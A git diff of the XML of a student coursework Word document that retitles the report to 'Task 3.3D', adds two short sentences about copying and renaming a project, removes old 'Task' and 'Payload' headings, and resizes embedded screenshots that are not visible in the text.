--- a/sit218_coding/task33d/ans1.docx
+++ b/sit218_coding/task33d/ans1.docx
@@ -11,7 +11,7 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Task 2.4P</w:t>
+        <w:t xml:space="preserve">Task 3.3D</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -24,7 +24,26 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Setup</w:t>
+        <w:t xml:space="preserve">Step 1
+</w:t>
+      </w:r>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">I first copied the project.</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -33,40 +52,8 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:highlight w:val="none"/>
@@ -77,7 +64,7 @@
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="5363068"/>
+                <wp:extent cx="6858000" cy="1874805"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="1" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -87,7 +74,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="691667449" name=""/>
+                        <pic:cNvPr id="1613387304" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -100,7 +87,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6857999" cy="5363067"/>
+                          <a:ext cx="6858000" cy="1874804"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -133,7 +120,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i0" o:spid="_x0000_s0" type="#_x0000_t75" style="width:540.00pt;height:422.29pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i0" o:spid="_x0000_s0" type="#_x0000_t75" style="width:540.00pt;height:147.62pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId9" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -151,22 +138,45 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
+      <w:r>
         <w:rPr>
           <w:highlight w:val="none"/>
         </w:rPr>
-      </w:pPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:t xml:space="preserve">I also refactored the codebase a little by rename the project name.</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2150558"/>
+                <wp:extent cx="6858000" cy="2131692"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="2" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -176,7 +186,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="747567032" name=""/>
+                        <pic:cNvPr id="217925966" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -189,7 +199,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2150557"/>
+                          <a:ext cx="6858000" cy="2131691"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -222,7 +232,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i1" o:spid="_x0000_s1" type="#_x0000_t75" style="width:540.00pt;height:169.34pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i1" o:spid="_x0000_s1" type="#_x0000_t75" style="width:540.00pt;height:167.85pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId10" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -240,32 +250,59 @@
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:highlight w:val="none"/>
         </w:rPr>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1682853"/>
+                <wp:extent cx="6858000" cy="2973645"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="3" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -275,7 +312,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="661089447" name=""/>
+                        <pic:cNvPr id="775808948" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -286,9 +323,9 @@
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm rot="0" flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1682853"/>
+                          <a:ext cx="6858000" cy="2973643"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -321,7 +358,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i2" o:spid="_x0000_s2" type="#_x0000_t75" style="width:540.00pt;height:132.51pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i2" o:spid="_x0000_s2" type="#_x0000_t75" style="width:540.00pt;height:234.15pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId11" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -329,81 +366,8 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="830"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Task 1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -411,26 +375,16 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2593105"/>
+                <wp:extent cx="6858000" cy="2982102"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="4" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -440,7 +394,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1040508031" name=""/>
+                        <pic:cNvPr id="1508562522" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -453,7 +407,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2593104"/>
+                          <a:ext cx="6858000" cy="2982102"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -486,7 +440,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i3" o:spid="_x0000_s3" type="#_x0000_t75" style="width:540.00pt;height:204.18pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i3" o:spid="_x0000_s3" type="#_x0000_t75" style="width:540.00pt;height:234.81pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId12" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -494,42 +448,35 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="3034914"/>
+                <wp:extent cx="6858000" cy="3521222"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="5" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -539,7 +486,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1622032031" name=""/>
+                        <pic:cNvPr id="475305568" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -552,7 +499,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="3034914"/>
+                          <a:ext cx="6857999" cy="3521222"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -585,7 +532,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i4" o:spid="_x0000_s4" type="#_x0000_t75" style="width:540.00pt;height:238.97pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i4" o:spid="_x0000_s4" type="#_x0000_t75" style="width:540.00pt;height:277.26pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId13" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -593,88 +540,7 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="830"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Task 2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="831"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Payload 1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -682,57 +548,26 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
       <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2429890"/>
+                <wp:extent cx="6858000" cy="2019699"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="6" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -742,7 +577,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1244420647" name=""/>
+                        <pic:cNvPr id="1732626599" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -753,9 +588,9 @@
                         <a:stretch/>
                       </pic:blipFill>
                       <pic:spPr bwMode="auto">
-                        <a:xfrm>
+                        <a:xfrm rot="0" flipH="0" flipV="0">
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2429890"/>
+                          <a:ext cx="6858000" cy="2019697"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -788,7 +623,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i5" o:spid="_x0000_s5" type="#_x0000_t75" style="width:540.00pt;height:191.33pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i5" o:spid="_x0000_s5" type="#_x0000_t75" style="width:540.00pt;height:159.03pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId14" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -796,42 +631,30 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+      <w:r/>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="1927607"/>
+                <wp:extent cx="6858000" cy="1453896"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="7" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -841,7 +664,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="422874581" name=""/>
+                        <pic:cNvPr id="1886698819" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -854,7 +677,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="1927607"/>
+                          <a:ext cx="6858000" cy="1453896"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -887,7 +710,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i6" o:spid="_x0000_s6" type="#_x0000_t75" style="width:540.00pt;height:151.78pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i6" o:spid="_x0000_s6" type="#_x0000_t75" style="width:540.00pt;height:114.48pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId15" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -895,31 +718,6 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="831"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Payload 2</w:t>
-      </w:r>
       <w:r/>
       <w:r/>
     </w:p>
@@ -928,32 +726,16 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+        <w:rPr/>
+      </w:pPr>
       <w:r/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
+      <w:r/>
       <w:r>
         <mc:AlternateContent>
           <mc:Choice Requires="wpg">
             <w:drawing>
               <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
-                <wp:extent cx="6858000" cy="2575429"/>
+                <wp:extent cx="6858000" cy="2142845"/>
                 <wp:effectExtent l="0" t="0" r="0" b="0"/>
                 <wp:docPr id="8" name=""/>
                 <wp:cNvGraphicFramePr>
@@ -963,7 +745,7 @@
                   <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                     <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                       <pic:nvPicPr>
-                        <pic:cNvPr id="1345261354" name=""/>
+                        <pic:cNvPr id="354839080" name=""/>
                         <pic:cNvPicPr>
                           <a:picLocks noChangeAspect="1"/>
                         </pic:cNvPicPr>
@@ -976,7 +758,7 @@
                       <pic:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="6858000" cy="2575428"/>
+                          <a:ext cx="6858000" cy="2142845"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -1009,7 +791,7 @@
                 <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
                 <o:lock v:ext="edit" aspectratio="t"/>
               </v:shapetype>
-              <v:shape id="_x0000_i7" o:spid="_x0000_s7" type="#_x0000_t75" style="width:540.00pt;height:202.79pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
+              <v:shape id="_x0000_i7" o:spid="_x0000_s7" type="#_x0000_t75" style="width:540.00pt;height:168.73pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                 <v:imagedata r:id="rId16" o:title=""/>
                 <o:lock v:ext="edit" rotation="t"/>
               </v:shape>
@@ -1017,92 +799,24 @@
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
